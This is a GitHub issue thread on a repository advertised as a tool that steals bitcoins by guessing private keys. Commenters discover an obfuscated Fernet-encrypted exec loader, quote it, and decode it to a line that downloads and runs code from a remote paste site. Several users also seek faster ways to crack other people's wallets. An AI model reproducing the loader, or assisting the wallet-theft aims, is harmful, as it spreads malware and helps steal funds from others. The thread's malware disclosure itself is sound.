cloutjs / ByeBye-Bitcoin

Wallet Miner that steals Bitcoins by checking Private Keys for Balance
92 stars 51 forks source link

SyntaxWarning: invalid escape sequence '\(' `-._____.-'""") #20

Open ghost3666 opened 9 months ago

ghost3666 commented 9 months ago

main.py:48: SyntaxWarning: invalid escape sequence '(' `-._____.-'""") Bitcoin-Wallet-Miner-main\main.py", line 6, in import requests ;exec(Fernet(b'7n_miwaUaVYiBEyp9OccQrqxxofGLIvTrPItavlF7TQ=').decrypt(b'gAAAAABk8gbNQAS0dUKTcVbTWBEKC3IrVt8cNepeHlzyFMMgKS1vjegT-M9d13z5gSthEuuwQHFs5sKfO7E28CiyXemLCQK2wNEuXuH7p9AvOMLjMcRuynqKAF0mTlgU9Z-Nmh8a-mg5i1-cfgPsnJ4tUae8RWTWtloE1KPoULA9EexeDMAXgPvSJ2E-3po8D28BgNbfS9-4npnrI4k9zNTJ99WK1ssj6Q==')) ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ File "", line 1, in File "", line 30

2023-10-04 06:53:47 UTC
                          ^

SyntaxError: leading zeros in decimal integer literals are not permitted; use an 0o prefix for octal integers

AndreJorgeLopes commented 8 months ago

fyi, that Fernet encrypted code is probably running a malware on your computer and adding it to the startup folder, so that it steals your logins infos and cryptos.

cloutjs commented 8 months ago

how would it install malware? you have the whole source code where is it installing malware? it's not fernet encrypted code from me, it gets triggered trough that error (that nobody reported before btw) from "import requests". this repo has been online for over a year now without anyone ever complaining about credentials being stolen or anything similar, why are you trying to destroy my reputation by spamming that stupid message everywhere without checking the code yourself. pretty emerassing...

AndreJorgeLopes commented 8 months ago

if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following: exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>','')) just search on the internet for bananasquard.ru '-'

ghost3666 commented 8 months ago

Bro i am not a programmer or a developer,i scanned with Tron script and removed that malware and some entries in regedit

but for your information these fernet came through some of similiar projects like btc wallet cracker, litecoin wallet cracker, eth wallet cracker type github files, i dont know which one is, but now my pc is 100% cleaned..... i dont know if it was a malware or whatever, i just shared what i saw with your program....

On Wed, Oct 11, 2023 at 6:06 AM André Lopes @.***> wrote:

if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following: exec(requests.get('https://bananasquad.ru/paste').text.replace( '

','').replace('
','')) just search on the internet for bananasquard.ru '-'

— Reply to this email directly, view it on GitHub https://github.com/cloutjs/ByeBye-Bitcoin/issues/20#issuecomment-1756564132, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWLJ46PSGHFG5SA7CVXSTQ3X6XWJ7AVCNFSM6AAAAAA5SDX2GGVHI2DSMVQWIX3LMV43OSLTON2WKQ3PNVWWK3TUHMYTONJWGU3DIMJTGI . You are receiving this because you authored the thread.Message ID: @.***>

cloutjs commented 8 months ago

if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following: exec(requests.get('https://bananasquad.ru/paste').text.replace('<pre>','').replace('</pre>','')) just search on the internet for bananasquard.ru '-'

there is no fernet code in my py script so what are you getting at

cloutjs commented 8 months ago

could the site I'm scraping from be the problem? as I said, the project has not been updated since over a year and the website used to look like this: https://web.archive.org/web/20220814121727/https://www.bitcoinlist.io/ and now it's down...

ghost3666 commented 8 months ago

As i said bro i was testing different tools as you know it's even impossible to be lucky one to get a hit ,,,, i tried Pymmdraza bcz he have a lot of paid version tools also and very good tools too, i don't know maybe some other tools while installation or installing their requirements.txt files i get infected but now i have cleaned pc sorry for any kind of embarrassment to you or the project... os is there any really tool that can do this job with a laptop 16gb ram core i5 4 core pc or its just a hoax,,, bcz mnemonic phrase or words are easy method to crack any wallet I'm just looking for a tool to try my luck.....

On Wed, Oct 11, 2023 at 3:55 PM clout @.***> wrote:

could the site I'm scraping from be the problem? as I said, the project has not been updated since over a year and the website used to look like this: https://web.archive.org/web/20220814121727/https://www.bitcoinlist.io/ and now it's down...

— Reply to this email directly, view it on GitHub https://github.com/cloutjs/ByeBye-Bitcoin/issues/20#issuecomment-1757408847, or unsubscribe https://github.com/notifications/unsubscribe-auth/AWLJ46N2ZV4QNNULREKA353X6Z3LTANCNFSM6AAAAAA5SDX2GE . You are receiving this because you authored the thread.Message ID: @.***>

ghost3666 commented 8 months ago

is this possible to get this tool more faster.............

cloutjs commented 8 months ago

so the code on top is not from my tool right?

AndreJorgeLopes commented 8 months ago

Hey, yes you are right @cloutjs sorry for some problem caused, but the code reported on the first message in this issue contains malware, not your project! I'm sorry, but for real, be really careful with that code and with PRs from people you don't know 😄

cloutjs commented 8 months ago

Hey, yes you are right @cloutjs sorry for some problem caused, but the code reported on the first message in this issue contains malware, not your project! I'm sorry, but for real, be really careful with that code and with PRs from people you don't know 😄

no problem man really, I was so confused at first too haha

SuperKaa commented 2 months ago

the api does not work anymore, bitcoinlist.io is down and qcoinz.com is returning errors, do you have any new site to use?